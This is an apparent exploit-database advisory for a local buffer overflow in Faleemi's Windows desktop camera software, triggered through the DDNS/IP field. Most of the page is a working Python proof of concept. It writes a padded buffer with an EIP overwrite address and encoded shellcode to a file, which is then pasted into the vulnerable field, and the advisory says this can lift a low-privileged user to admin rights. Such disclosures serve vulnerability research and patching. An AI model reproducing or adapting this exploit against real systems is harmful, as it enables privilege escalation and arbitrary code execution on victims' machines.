Faleemi Windows Desktop Software (DDNS/IP) Local Buffer Overflow

2018.03.31
Credit: Himavanth Reddy
Risk: High
Local: Yes
Remote: No
CVE: N/A
CWE: CWE-119

''' Faleemi Desktop Software for Windows- (DDNS/IP) Local Buffer Overflow Vuln Description: Faleemi Desktop Software for Windows and its Beta version (Faleemi Plus Desktop Software for Windows(Beta)) are vulnerable to Buffer Overflow exploit. When overly input is given to DDNS/IP parameter, it overflows the buffer corrupting EIP which can utilized cleverly for local arbitrary code execution. If this software is running as admin and if a low priv user has access to this application to enter new device, he can exploit the Buffer Overflow in the DDNS/IP parameter to obtain Admin privs. An attacker could exploit this vulnerability to execute arbitrary code in the context of the application. Failed exploit attempts will result in a denial-of-service condition. Vulnerable Application Info: 1. Faleemi Desktop Software for Windows URL: http://support.faleemi.com/fsc776/Faleemi_v1.8.exe 2. Faleemi Desktop Software for Windows (Beta) URL: http://support.faleemi.com/fsc776/Faleemi_Plus_v1.0.2.exe After hitting enter new device, click Enter device manually ''' #!/usr/bin/python import socket # Create an array of buffers, from 1 to 5900, with increments of 200. calc = ("\x54\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49" "\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b" "\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58" "\x50\x38\x41\x42\x75\x4a\x49\x59\x6c\x6b\x58\x6b\x32\x53\x30" "\x57\x70\x67\x70\x53\x50\x4e\x69\x39\x75\x54\x71\x39\x50\x61" "\x74\x6c\x4b\x66\x30\x44\x70\x6c\x4b\x73\x62\x46\x6c\x6e\x6b" "\x66\x32\x66\x74\x4e\x6b\x62\x52\x65\x78\x44\x4f\x78\x37\x72" "\x6a\x46\x46\x44\x71\x6b\x4f\x4c\x6c\x57\x4c\x53\x51\x51\x6c" "\x47\x72\x34\x6c\x47\x50\x69\x51\x6a\x6f\x64\x4d\x37\x71\x59" "\x57\x6d\x32\x5a\x52\x51\x42\x61\x47\x4e\x6b\x36\x32\x44\x50" "\x6c\x4b\x73\x7a\x55\x6c\x4c\x4b\x42\x6c\x52\x31\x63\x48\x6d" "\x33\x32\x68\x43\x31\x5a\x71\x53\x61\x6c\x4b\x36\x39\x31\x30" "\x73\x31\x4e\x33\x4c\x4b\x50\x49\x65\x48\x39\x73\x46\x5a\x37" "\x39\x4e\x6b\x64\x74\x4e\x6b\x63\x31\x78\x56\x35\x61\x6b\x4f" "\x6e\x4c\x39\x51\x7a\x6f\x46\x6d\x63\x31\x4b\x77\x50\x38\x6d" "\x30\x32\x55\x79\x66\x35\x53\x71\x6d\x78\x78\x57\x4b\x61\x6d" "\x35\x74\x70\x75\x69\x74\x30\x58\x4c\x4b\x30\x58\x31\x34\x75" "\x51\x69\x43\x70\x66\x4c\x4b\x44\x4c\x50\x4b\x6c\x4b\x42\x78" "\x75\x4c\x76\x61\x4e\x33\x4e\x6b\x57\x74\x4e\x6b\x55\x51\x6a" "\x70\x4d\x59\x67\x34\x67\x54\x77\x54\x63\x6b\x53\x6b\x33\x51" "\x42\x79\x73\x6a\x33\x61\x69\x6f\x59\x70\x61\x4f\x61\x4f\x42" "\x7a\x6e\x6b\x34\x52\x58\x6b\x6e\x6d\x61\x4d\x62\x4a\x35\x51" "\x4c\x4d\x4f\x75\x4f\x42\x73\x30\x33\x30\x63\x30\x46\x30\x42" "\x48\x45\x61\x6e\x6b\x52\x4f\x4d\x57\x6b\x4f\x4a\x75\x4d\x6b" "\x4c\x30\x58\x35\x39\x32\x51\x46\x51\x78\x49\x36\x4a\x35\x6f" "\x4d\x4d\x4d\x59\x6f\x4a\x75\x55\x6c\x54\x46\x31\x6c\x65\x5a" "\x6d\x50\x59\x6b\x49\x70\x31\x65\x37\x75\x4f\x4b\x73\x77\x62" "\x33\x62\x52\x52\x4f\x53\x5a\x73\x30\x76\x33\x79\x6f\x68\x55" "\x62\x43\x70\x61\x42\x4c\x35\x33\x76\x4e\x53\x55\x30\x78\x43" "\x55\x43\x30\x41\x41") buffer = "A" * 132 + "\x4B\x43\x71\x6B" + calc f = open('shellcode.txt', "wb") f.write(buffer) f.close()

References:

http://cxsecurity.com/issue/WLB-2017090237


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top